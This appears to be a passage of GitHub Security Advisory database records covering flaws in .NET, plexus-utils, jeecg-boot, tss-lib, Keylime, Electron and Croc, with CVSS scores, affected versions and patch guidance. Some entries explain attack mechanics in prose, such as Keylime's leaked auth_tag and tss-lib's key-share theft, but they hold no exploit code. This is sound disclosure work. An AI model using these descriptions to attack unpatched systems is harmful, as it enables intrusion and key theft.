# Microsoft Security Advisory CVE-2023-36799: .NET Denial of Service Vulnerability ## <a name="executive-summary"></a>Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET where reading a maliciously crafted X.509 certificate may result in Denial of Service. This issue only affects Linux systems. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/275 ### <a name="mitigation-factors"></a>Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## <a name="affected-software"></a>Affected software * Any .NET 7.0 application running on .NET 7.0.10 or earlier. * Any .NET 6.0 application running on .NET 6.0.21 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### <a name=".NET 7"></a>.NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NETCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-arm64) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-arm) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-arm) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-x64) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-x64) | >= 7.0.0, <= 7.0.10 | 7.0.11 ### <a name=".NET 6"></a>.NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NETCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-arm64) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-arm64) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-arm) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-arm) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-x64) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.linux-musl-x64) | >= 6.0.0, <= 6.0.21 | 6.0.22 ## Advisory FAQ ### <a name="how-affected"></a>How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### <a name="how-fix"></a>How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.11 or SDK 7.0.111 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.22 or SDK 6.0.317 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>. ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-36799]( https://www.cve.org/CVERecord?id=CVE-2023-36799) ### Revisions V1.0 (September 12, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-09-12_
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.linux-musl-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}]
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-h3hv-63q5-jgpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36799'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36799'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-12T19:57:06Z', 'nvd_published_at': None}
1.4.0
GHSA-g4p8-g7mq-wpx4
2023-09-12T20:15:59Z
2023-09-12T20:15:59Z
null
['CVE-2023-36793']
Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability
# Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability ## <a name="executive-summary"></a>Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in Microsoft.DiaSymReader.Native.amd64.dll when reading a corrupted PDB file which may lead to remote code execution. This issue only affects Windows systems. **Note:** The vulnerabilities [CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36792), [CVE-2023-36793]( https://www.cve.org/CVERecord?id=CVE-2023-36793), [CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36794), [CVE-2023-36796]( https://www.cve.org/CVERecord?id=CVE-2023-36796) are all resolved by a single patch. Get [affected software](#affected-software) to resolve all of them. ## Discussion Discussion for this issue can be found at https://github.com/dotnet/runtime/issues/91947 ### <a name="mitigation-factors"></a>Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## <a name="affected-software"></a>Affected software * Any .NET 7.0 application running on .NET 7.0.10 or earlier. * Any .NET 6.0 application running on .NET 6.0.21 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### <a name=".NET 7"></a>.NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.10 | 7.0.11 [Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.10 | 7.0.11 ### <a name=".NET 6"></a>.NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.21 | 6.0.22 [Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.21 | 6.0.22 ## Advisory FAQ ### <a name="how-affected"></a>How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### <a name="how-fix"></a>How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.11 or SDK 7.0.111 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.22 or SDK 6.0.317 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>. ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-36793]( https://www.cve.org/CVERecord?id=CVE-2023-36793) ### Revisions V1.0 (September 12, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-09-12_
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.10'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.21'}}]
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-g4p8-g7mq-wpx4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36793'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36793'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-12T20:15:59Z', 'nvd_published_at': None}
1.4.0
GHSA-g6ph-x5wf-g337
2023-09-26T17:59:40Z
2023-09-25T21:30:26Z
null
['CVE-2022-4244']
plexus-codehaus vulnerable to directory traversal
A flaw was found in plexus-codehaus. A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the intended folder. By manipulating files with dot-dot-slash (`../`) sequences and their variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.codehaus.plexus:plexus-utils'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.24'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4244'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-utils/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-utils/commit/33a2853df8185b4519b1b8bfae284f03392618ef'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3906'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-4244'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2149841'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-31521'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-26T17:59:40Z', 'nvd_published_at': None}
1.4.0
GHSA-rwhx-6hx7-pqc8
2023-09-25T17:21:03Z
2023-09-22T21:30:23Z
null
['CVE-2023-40989']
SQL injection in jeecgboot
SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the `report/jeecgboot/jmreport/queryFieldBySql` component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40989'}, {'type': 'WEB', 'url': 'https://github.com/Zone1-Z/CVE-2023-40989/blob/main/CVE-2023-40989'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-09-22T23:35:35Z', 'nvd_published_at': None}
1.4.0
GHSA-h24c-6p6p-m3vx
2023-09-01T20:51:05Z
2023-09-01T20:51:05Z
null
[]
tss-lib leaks secret keys in response to incorrectly constructed Paillier moduli
### Impact The specification of the GG18 threshold ECDSA signature protocol contains a vulnerability allowing an attacker to recover the shared secret key. If a participant generates a Paillier modulus `N` containing small factors (less than `2^100`) they can interact with other participants in the signing protocol to steal their secret key shares in as little as sixteen signing attempts. The master key can then be reconstructed from these shares. ### Patches The implementation of GG18 in tss-lib did not prove that `N` is biprime or that it doesn't contain small factors. The fixed implementation adds the following proofs from the CGGMP21 threshold ECDSA protocol to the key generation: - Paillier-Blum Modulus (`N` is the product of two primes) - No Small Factor (both factors of `N` are greater than `2^256`) These proofs apply to both the Paillier encryption modulus `N`, and the modulus `NTilde` used in MTA proofs. To address the issue in the resharing protocol, an additional round has been added to the end so that participants can confirm that they received valid proofs. ### References - [GG18](https://eprint.iacr.org/2019/114) - [CGGMP21](https://eprint.iacr.org/2021/060)
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/bnb-chain/tss-lib'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/threshold-network/tss-lib/security/advisories/GHSA-h24c-6p6p-m3vx'}, {'type': 'WEB', 'url': 'https://github.com/threshold-network/tss-lib/commit/2e712689cfbeefede15f95a0ec7112227d86f702'}, {'type': 'WEB', 'url': 'https://eprint.iacr.org/2019/114'}, {'type': 'WEB', 'url': 'https://eprint.iacr.org/2021/060'}, {'type': 'PACKAGE', 'url': 'https://github.com/threshold-network/tss-lib'}]
{'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-09-01T20:51:05Z', 'nvd_published_at': None}
1.4.0
GHSA-f4r5-q63f-gcww
2023-09-06T13:49:43Z
2023-09-06T13:49:43Z
null
['CVE-2023-38201']
Keylime registrar and (untrusted) Agent can be bypassed by an attacker
### Impact A security issue was found in the Keylime `registrar` code which allows an attacker to effectively bypass the challenge-response protocol used to verify that an `agent` has indeed access to an AIK which in indeed related to the EK. When an `agent` starts up, it will contact a `registrar` and provide a public EK and public AIK, in addition to the EK Certificate. This `registrar` will then challenge the `agent` to decrypt a challenge encrypted with the EK. When receiving the wrong "auth_tag" back from the `agent` during activation, the `registrar` answers with an error message that contains the expected correct "auth_tag" (an HMAC which is calculated within the `registrar` for checking). An attacker could simply record the correct expected "auth_tag" from the HTTP error message and perform the activate call again with the correct expected "auth_tag" for the `agent`. The security issue allows an attacker to pass the challenge-response protocol during registration with (almost) arbitrary registration data. In particular, the attacker can provide a valid EK Certificate and EK, which passes verification by the `tenant` (or `registrar`), while using a compromised AIK, which is stored unprotected outside the TPM and is unrelated to former two. The attacker then deliberately fails the initial activation call to get to know the correct "auth_tag" and then provides it in a subsequent activation call. This results in an `agent` which is (incorrectly) registered with a valid EK Certificate, but with a compromised/unrelated AIK. ### Patches Users should upgrade to release 7.5.0
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'keylime'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/keylime/keylime/security/advisories/GHSA-f4r5-q63f-gcww'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38201'}, {'type': 'WEB', 'url': 'https://github.com/keylime/keylime/commit/9e5ac9f25cd400b16d5969f531cee28290543f2a'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:5080'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-38201'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2222693'}, {'type': 'PACKAGE', 'url': 'https://github.com/keylime/keylime'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/keylime/PYSEC-2023-160.yaml'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-06T13:49:43Z', 'nvd_published_at': None}
1.4.0
GHSA-7x97-j373-85x5
2023-09-06T19:51:33Z
2023-09-06T19:51:33Z
null
['CVE-2023-39956']
Electron vulnerable to out-of-package code execution when launched with arbitrary cwd
### Impact Apps that are launched as command line executables are impacted. E.g. if your app exposes itself in the path as `myapp --help` Specifically this issue can only be exploited if the following conditions are met: * Your app is launched with an attacker-controlled working directory * The attacker has the ability to write files to that working directory This makes the risk quite low, in fact normally issues of this kind are considered outside of our threat model as similar to Chromium we exclude [Physically Local Attacks](https://github.com/electron/electron/security/advisories/GHSA-7x97-j373-85x5#:~:text=Physically%20Local%20Attacks) but given the ability for this issue to bypass certain protections like ASAR Integrity it is being treated with higher importance. Please bear this in mind when reporting similar issues in the future. ### Workarounds There are no app side workarounds, you must update to a patched version of Electron. ### Fixed Versions * `26.0.0-beta.13` * `25.5.0` * `24.7.1` * `23.3.13` * `22.3.19` ### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '22.3.19'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0-alpha.1'}, {'fixed': '23.3.13'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0-alpha.1'}, {'fixed': '24.7.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0.0-alpha.1'}, {'fixed': '25.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '26.0.0-alpha.1'}, {'fixed': '26.0.0-beta.13'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-7x97-j373-85x5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39956'}, {'type': 'PACKAGE', 'url': 'https://github.com/electron/electron'}]
{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-06T19:51:33Z', 'nvd_published_at': None}
1.4.0
GHSA-364c-vvqx-446c
2023-09-22T19:43:27Z
2023-09-20T06:30:50Z
null
['CVE-2023-43620']
Croc sender may place ANSI or CSI escape sequences in filename to attach receiver's terminal device
An issue was discovered in Croc through 9.6.5. A sender may place ANSI or CSI escape sequences in a filename to attack the terminal device of a receiver.
